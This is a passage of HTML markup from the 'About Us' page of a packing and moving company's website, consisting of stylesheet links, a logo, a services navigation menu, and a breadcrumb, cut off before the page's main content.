8px 10px !important; margin-top:0px !important; } .enq-msg { height: 70px !important; padding-left: 10px !important; } } </style> <!-- main stylesheet --> <link rel="stylesheet" href="https://www.bluebirdpackingmoving.com/wp-content/themes/bluebird/css/custom.css"> <!-- responsive stylesheet --> <link rel="stylesheet" href="https://www.bluebirdpackingmoving.com/wp-content/themes/bluebird/css/responsive.css"> </head> <body class="page-template-default page page-id-57"> <!-- #topbar --> <section id="topbar"> <div class="container"> <div class="row"> <div class="col-lg-12 "> <div class="contact-info pull-left hidden-xs"> </div> <!-- /.contact-info --> <div class="social"> </div> <!-- /.social --> </div> </div> </div> </section> <!-- /#topbar --> <!-- start header --> <header id="header" class="stricky"> <div class="container"> <div class="logo"> <a href="https://www.bluebirdpackingmoving.com/"> <img src="https://www.bluebirdpackingmoving.com/wp-content/themes/bluebird/img/resources/logo.png" alt="Awesome Image"/> </a> </div> <!-- end header --> <!-- start mainmenu --> <nav class="mainmenu-navigation"> <div class="navigation pull-right"> <div class="nav-header"> <button><i class="fa fa-bars"></i></button> </div> <div class="nav-footer"><ul id="menu-main-menu" class="nav"><li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-21"><a href="https://www.bluebirdpackingmoving.com/">Home</a></li> <li id="menu-item-60" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-57 current_page_item menu-item-has-children menu-item-60"><a href="https://www.bluebirdpackingmoving.com/about-us/" aria-current="page">About Us</a> <ul class="sub-menu"> <li id="menu-item-597" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-597"><a href="https://www.bluebirdpackingmoving.com/reviews/">Reviews</a></li> <li id="menu-item-596" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-596"><a href="https://www.bluebirdpackingmoving.com/achievement/">Achievement</a></li> </ul> </li> <li id="menu-item-169" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-169"><a href="#">Logistic</a> <ul class="sub-menu"> <li id="menu-item-170" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-170"><a href="https://www.bluebirdpackingmoving.com/industrial-transportation/">Industrial Transportation</a></li> <li id="menu-item-229" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-229"><a href="https://www.bluebirdpackingmoving.com/machinery-transportation/">Machinery Transportation</a></li> <li id="menu-item-230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230"><a href="https://www.bluebirdpackingmoving.com/part-consignment/">Part Consignment</a></li> <li id="menu-item-231" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-231"><a href="https://www.bluebirdpackingmoving.com/odc-consignment/">ODC Consignment</a></li> <li id="menu-item-234" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-234"><a href="https://www.bluebirdpackingmoving.com/ware-house/">Warehouse</a></li> <li id="menu-item-235" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-235"><a href="https://www.bluebirdpackingmoving.com/railway-booking/">Railway Parcel Booking</a></li> </ul> </li> <li id="menu-item-263" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-263"><a href="#">Packers and Movers</a> <ul class="sub-menu"> <li id="menu-item-272" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-272"><a href="https://www.bluebirdpackingmoving.com/home-relocation/">Home Relocation</a></li> <li id="menu-item-271" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-271"><a href="https://www.bluebirdpackingmoving.com/corporate-relocation/">Corporate Relocation</a></li> <li id="menu-item-270" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-270"><a href="https://www.bluebirdpackingmoving.com/local-shifting/">Local Shifting</a></li> <li id="menu-item-269" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-269"><a href="https://www.bluebirdpackingmoving.com/packing-unpacking/">Packing Unpacking</a></li> <li id="menu-item-268" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-268"><a href="https://www.bluebirdpackingmoving.com/loading-unloading/">Loading Unloading</a></li> <li id="menu-item-267" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-267"><a href="https://www.bluebirdpackingmoving.com/assemble-furniture/">Assemble Furniture</a></li> <li id="menu-item-266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-266"><a href="https://www.bluebirdpackingmoving.com/international-cargo/">International Cargo</a></li> <li id="menu-item-265" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-265"><a href="https://www.bluebirdpackingmoving.com/pet-moving/">Pet Moving</a></li> <li id="menu-item-264" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-264"><a href="https://www.bluebirdpackingmoving.com/transit-insurance/">Transit Insurance</a></li> <li id="menu-item-232" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-232"><a href="https://www.bluebirdpackingmoving.com/bike-transportation/">Bike Transportation</a></li> <li id="menu-item-233" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-233"><a href="https://www.bluebirdpackingmoving.com/car-transportation/">Car Transportation</a></li> </ul> </li> <li id="menu-item-107" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-107"><a href="https://www.bluebirdpackingmoving.com/client-testimonials/">Testimonials</a></li> <li id="menu-item-120" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-120"><a href="https://www.bluebirdpackingmoving.com/tracking/">Tracking</a></li> <li id="menu-item-106" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-106"><a href="https://www.bluebirdpackingmoving.com/contact-us/">Contact Us</a></li> </ul></div> </div> </nav> </div> </header> <!-- page-title --> <section id="breadcrumb-area"> <div class="overlay"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="breadcrumb-title"> <h1>About Us</h1> </div> <div class="page-breadcrumb"> <i class="fa fa-home"></i> <a href="https://www.bluebirdpackingmoving.com/">Home</a> <i class="fa fa-angle-right"></i> <span>About Us</span> </div> <!-- page-breadcumb --> </div> </div> </div> </div> </section> <!-- page-title --> <div id="primary" class="content-area"> <div id="main" class="container" role="main"> <article id="post-57" class="post-57 page type-page status-publish hentry">